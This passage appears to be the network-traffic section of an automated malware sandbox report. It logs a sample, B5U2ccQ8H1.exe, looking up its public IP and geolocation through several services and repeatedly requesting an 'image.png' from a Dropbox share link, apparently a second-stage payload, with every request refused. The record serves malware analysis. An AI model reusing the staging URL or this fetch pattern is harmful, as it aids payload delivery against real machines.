Jul 7, 2024 07:06:08.884515047 CEST	641	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:07 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 55 X-Rl: 42 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49748	208.95.112.1	80	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
Jul 7, 2024 07:06:09.149930000 CEST	39	OUT	GET /xml HTTP/1.1 Host: ip-api.com
Jul 7, 2024 07:06:09.609289885 CEST	641	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:08 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 54 X-Rl: 41 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:57 UTC	67	OUT	GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2024-07-07 05:05:57 UTC	637	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 07 Jul 2024 05:05:57 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sun, 07 Jul 2024 06:05:57 GMT Location: https://ipbase.com/xml/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=peM51yu99bCIDZckyI2Hdw1e48jIETzvDI12gvncr5uhpL%2BogOFNfYtsCp9rRbszLFWP8SNcDoVirTnnUjZALosZt5OPoT0%2Fc4VOiqJfkjzUK09h0i92z0bCUfSHXekq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89f54d6f7d154251-EWR alt-svc: h3=":443"; ma=86400
2024-07-07 05:05:57 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:57 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:57 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:58 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-07 05:05:58 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:05:58 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 6373bb7481014ebcb57cf2f361c3f18f Connection: close
2024-07-07 05:05:58 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49733	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:58 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-07 05:05:58 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:05:58 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: b778406db2304ee29c53c943ff859c8f Connection: close
2024-07-07 05:05:58 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:59 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:00 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:05:59 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: d8748e13c7ad4421848197551acad976 Connection: close
2024-07-07 05:06:00 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:05:59 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:00 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:00 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 62fb7f4bf396493f8c17c48fdd5aa455 Connection: close
2024-07-07 05:06:00 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:00 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:01 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:01 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 17752a5646d54d728935b16a0b4d6b13 Connection: close
2024-07-07 05:06:01 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:02 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:02 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:02 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 44a9c501cfc74d34bfd694059725a2e5 Connection: close
2024-07-07 05:06:02 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	104.26.12.205	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:03 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-07 05:06:03 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:03 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89f54d934bd27298-EWR
2024-07-07 05:06:03 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49742	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:04 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:04 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:04 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 25febb87e49241149b33d6ae0d8b8fbc Connection: close
2024-07-07 05:06:04 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49743	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:05 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:05 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:05 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: d33287379fe14809a65600605c9299c3 Connection: close
2024-07-07 05:06:05 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49744	162.125.66.15	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:06 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-07 05:06:07 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sun, 07 Jul 2024 05:06:06 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 2b16129b50e44c43b00c31323c7cfae5 Connection: close
2024-07-07 05:06:07 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49746	104.26.12.205	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
